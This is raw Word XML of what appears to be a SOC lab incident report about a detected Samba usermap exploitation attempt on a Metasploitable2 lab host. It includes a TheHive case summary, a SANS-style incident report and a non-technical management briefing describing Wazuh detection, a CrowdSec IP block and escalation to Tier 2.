    <w:p w14:paraId="0BCF8796" w14:textId="708171BA" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. ESCALATION TO TIER 2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>TheHive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Case Summary – 100 </w:t>
      </w:r>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>words)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33914BDA" w14:textId="099D15EA" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Case Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6817B32C" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve">A high-severity alert was triggered on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> SIEM indicating a Samba exploitation attempt originating from 192.168.1.101 targeting the Metasploitable2 host. The attack was confirmed through log correlation and aligned with MITRE technique T1210, Exploitation of Remote Services. Metasploit-style indicators such as unauthorized SMB script execution and reverse shell activity were validated. Immediate containment actions were performed using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> to block the attacker’s IP at the network perimeter. No further lateral movement was observed post-containment. Tier 2 analysis is required to validate persistence mechanisms, identify potential privilege escalation artifacts, and confirm whether additional hosts were scanned or targeted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA1242" w14:textId="77777777" w:rsidR="00043BF2" w:rsidRDefault="00043BF2"/>
    <w:p w14:paraId="27BA2912" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7424087F" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E1C464" w14:textId="2BC65E7F" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. INCIDENT REPORT (SANS-style – 200 words)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B382C09" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>200-Word Report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE2AEA" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve">This incident involved an attempted exploitation of the Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>usermap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> vulnerability on the Metasploitable2 host within the SOC lab environment. At 2025-08-18 14:00:00, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> generated a Level 10 alert indicating a remote code execution attempt from source IP 192.168.1.101. The exploit aligned with MITRE ATT&amp;CK technique T1210, Exploitation of Remote Services. Log analysis confirmed suspicious SMB script injection and system commands consistent with known Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C11E16" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve">Immediate containment actions were taken to prevent further access. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> was utilized to enforce an IP-level ban, and connectivity testing verified the block. No evidence of data exfiltration or session continuation was observed after the ban was applied. Asset integrity checks on the targeted VM did not reveal modifications, suggesting the attack was detected early during the exploitation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC0BFC" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve">The timeline included initial network probing, exploit delivery, alert generation, analyst triage, containment, and escalation. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>TheHive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> was used to document the event and forward the case to Tier 2 for deeper analysis, including persistence checks, privilege escalation review, and cross-host traffic correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F547BCC" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:t>Recommendations include enabling stricter SMB logging, implementing network segmentation, updating vulnerable services, enforcing stronger endpoint monitoring, and conducting periodic penetration testing to proactively identify exploitable weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DEBE5" w14:textId="012ED2F0" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB"/>
    <w:p w14:paraId="237A632C" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="666AE13F" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="749281BA" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EF7F2B" w14:textId="2D501716" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. MANAGEMENT BRIEFING (100 words)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE5955" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100-Word Non-Technical Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5DB02" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:r w:rsidRPr="008912FB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Our monitoring systems detected and blocked an attempted cyberattack targeting a vulnerable test server. The attacker tried to exploit a weakness in the Samba file-sharing service to gain unauthorized access. The SOC team identified the threat immediately through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> alerts and used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:t xml:space="preserve"> to block the attacker’s IP address, preventing further activity. No systems were damaged, and no data was accessed. The incident was escalated for deeper review to ensure no hidden risks remain. Overall, the response was fast and effective, demonstrating that our monitoring, detection, and containment processes are functioning as intended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584B5285" w14:textId="77777777" w:rsidR="00AA6100" w:rsidRDefault="00AA6100" w:rsidP="008912FB"/>
    <w:p w14:paraId="6F7E6407" w14:textId="785BF90C" w:rsidR="00AA6100" w:rsidRPr="00AA6100" w:rsidRDefault="00AA6100" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6100">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>architecture diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56EEE1" w14:textId="184C2311" w:rsidR="008912FB" w:rsidRDefault="00AA6100" w:rsidP="00AA6100">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F683F5" wp14:editId="55C6E355">
            <wp:extent cx="1913860" cy="4312669"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12784190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240" t="2873" r="18105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1935676" cy="4361830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008912FB" w:rsidSect="008912FB">
      <w:headerReference w:type="even" r:id="rId16"/>
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="even" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:headerReference w:type="first" r:id="rId20"/>
      <w:footerReference w:type="first" r:id="rId21"/>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8BC19" w14:textId="77777777" w:rsidR="00BF27DB" w:rsidRDefault="00BF27DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="50C17BB4" w14:textId="77777777" w:rsidR="00BF27DB" w:rsidRDefault="00BF2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EC1F" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">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E63B34" wp14:editId="4979EF17">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65B9DFBF"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2CB64571" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">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1DD8" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">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6E9343ED" wp14:editId="22A1BFE1">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23970AD7"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6243D529" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">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96C5" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">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5483A223" wp14:editId="58EFF3FA">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657057E1"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19D2F709" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">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668B" w14:textId="77777777" w:rsidR="00BF27DB" w:rsidRDefault="00BF27DB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F862952" w14:textId="77777777" w:rsidR="00BF27DB" w:rsidRDefault="00BF2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C24B" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251655168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="42AFFCA0" wp14:editId="747B6AFA">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E564" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="10F9011B" wp14:editId="3BAC1D7C">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DA0E" w14:textId="77777777" w:rsidR="008912FB" w:rsidRDefault="008912FB">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0A4D6BC9" wp14:editId="572CBAC9">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67F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E33E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27AF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="45CE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7666A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A2C8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B4066"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84145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9310F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91A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11649"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68A61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931493">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1591113003">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="447354541">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2089375630">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="7946331">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="332221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2FB"/>
    <w:rsid w:val="00043BF2"/>
    <w:rsid w:val="00046414"/>
    <w:rsid w:val="0019467C"/>
    <w:rsid w:val="002528A3"/>
    <w:rsid w:val="002710E7"/>
    <w:rsid w:val="002930FF"/>
    <w:rsid w:val="003351F5"/>
    <w:rsid w:val="0034152B"/>
    <w:rsid w:val="00342E3C"/>
    <w:rsid w:val="00484DAC"/>
    <w:rsid w:val="00571C3C"/>
    <w:rsid w:val="00623DD6"/>
    <w:rsid w:val="007871B3"/>
    <w:rsid w:val="008575DA"/>
    <w:rsid w:val="008912FB"/>
    <w:rsid w:val="00A83265"/>
    <w:rsid w:val="00AA6100"/>
    <w:rsid w:val="00AB1840"/>
    <w:rsid w:val="00BF27DB"/>
    <w:rsid w:val="00C32513"/>
    <w:rsid w:val="00D334DB"/>
    <w:rsid w:val="00D53289"/>
    <w:rsid w:val="00DA480D"/>
    <w:rsid w:val="00DA69D6"/>
    <w:rsid w:val="00DD64A8"/>
    <w:rsid w:val="00E67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48B2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DC570D44-D58E-42FD-B4FC-7655FC99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FB"/>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891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2FB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00891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2FB"/>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2FB"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008912FB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008912FB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008912FB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00891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2FB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00891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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-27T17:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-28T03:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>